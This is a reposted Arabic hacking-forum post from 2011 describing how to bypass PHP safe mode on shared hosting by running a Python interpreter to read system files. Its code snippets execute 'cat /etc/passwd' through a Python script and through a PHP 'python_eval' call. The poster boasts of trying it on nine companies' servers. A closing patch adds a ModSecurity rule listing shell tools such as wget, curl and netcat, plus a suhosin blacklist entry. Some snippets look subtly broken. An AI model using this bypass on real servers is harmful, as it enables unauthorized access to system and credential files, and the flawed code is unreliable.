معهد سكيورتي العرب | وظائف خالية
وظائف 2018 سوق السيارات عقارات 2018 الارشيف البحث
اسم العضو:  
كلمة المرور:     
تسجيل المساعدة قائمة الأعضاء اظهار المشاركات الجديدة اظهارمشاركات اليوم

ثغره تحت مسمى برآيفت


ثغره تحت مسمى برآيفت
التوقيت الحالي : 11-16-2024, 08:30 AM
مستخدمين يتصفحوا هذا الموضوع:
الكاتب: dr.wolf
آخر رد: dr.wolf
الردود : 0
المشاهدات : 2073

إضافة رد 

ثغره تحت مسمى برآيفت

الكاتب الموضوع

رقم العضوية :3
الاقامة : ام الدنيا
التواجد : غير متصل
معلومات العضو
المشاركات : 7,392
الإنتساب : Oct 2010
السمعة : 5


بيانات موقعي اسم الموقع : سكيورتي العرب
اصدار المنتدى : 1.6.8

مشاركات : #1
ثغره تحت مسمى برآيفت

ثغره تحت مسمى برآيفت


السلام عليكم ورحمة الله وبركاته :

ثغرة تحت مسمى برآيفت


كلنا سمعنا زمان عن الباثيون وخطورته ..

ومثل ماحنى عارفين ثغرات الـ perl بدت بـ الانقراضَ والحمد لله اكثر الشركات هنا تم التجريب جميع ثغرات البيرل وبادت بالفشلَ

وقدرت اتخطى بـ الباثيون وقرائة الملفات بشكل مباشر بدون السيملنك ولا غيره ، قرائه مباشرهَ

علماَ اللي يقول انا مو مثبت باثيون بـ سيرفر بسيطه ، يستطيع المخترق رفع مترجم خاص فيهَ

وتعددت الطرق ولكن هنا الحل بـ اذن الله ، جربته على كم سيرفر عندي وفعال 100 % بـ اذن اللهَ

يستطيع المخترق تشغيل الباثيون عن طريق المسار الافتراضي


كود :
#!/usr/bin/python

ان لم نصب الباثيون يستطيع تشغيل الشل والقرائه عن طريق : -

كود :
#!python -w -I/home/meshal/public_html/meshal/meshal.py


نستنتج من الكلمه باللون الاحمر انه رفع مترجم على نفس الملف وتشغيل بكل سهولهَ وهذي طريقتي الخاصه ولـ عيونكم ننزله

يستطيع المخترق تشغيل ملفاته عن طريق استخدام الاوامر بهذا الشكل


كود :
python meshal.py cat /etc/passwd


او يستطيع تشغيلها من ملف php

كود :
$code= python_eval
('
import os
pwd = os.getcwd()
print pwd
os.system('cat /etc/passwd')
');


بعض الملعومآت عن الثغره ، :-

1) تخطي تعطيل الدوآل ، في حالة كان الـSafe mode = off .
2) تخطي الـ Safe Mode على اكبر ، السيرفرات .
3) تخطي ، صحفات Forbidden و Internal Error عند تشغيل ، ملفات البــايثون .
4) ماتحتاج ملف .htaccess او أي اضافات خارجيه : فقط المترجم ، ( عكس البيرل )
5) لاتعتمد على دوال الـ PHP ابداً ،

طولنآ عليكمَ بس حبيت اوضح ، مدى خطورهآ لأني شفت ، خطورتهآ بـ نفسي ، بـ العربي ( 9 شركات هنا جربتهآ عليهم وشغاله 100 % )

الترقيعَ بسيط جداً وجربته ، بـ نفسيَ

1) أضافة بـ المود سكيورتيَ


كود :
SecRule REQUEST_URI|REQUEST_BODY "(cmd|command)=(cd|\;|perl |killall |[COLOR="Red"]python[/COLOR] |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |lwp-(download|request|mirror|rget) |id|uname|cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |whoami|\./|killall |rm \-[a-z|A-Z])"


2) وضع دالة بالبلاك لست بـ برنامج suhosin


كود :
python_eval


طريقةالترقيع قعدت 3 ايامَ جربت كل الطرق العميقه بـ نواة الليونكس لـ منع الباثيون لكن ، باتت بـ الفشل لـ الاسف ، فـ جربت الطريقه هذي وتوقف عملهَ 100 %

إْنتهى ، اتمنى ، استفدتوآ من هـ الشرحَ وانشاء الله يكون وآفيَ .. وبالتوفيقَ


منقول للاخ مشعل

ادارة سكيورتي العرب
04-06-2011 12:43 AM
إقتباس هذه الرسالة في الرد
إضافة رد 






سوق العرب | معهد سكيورتى العرب | وظائف خالية © 2024.
Google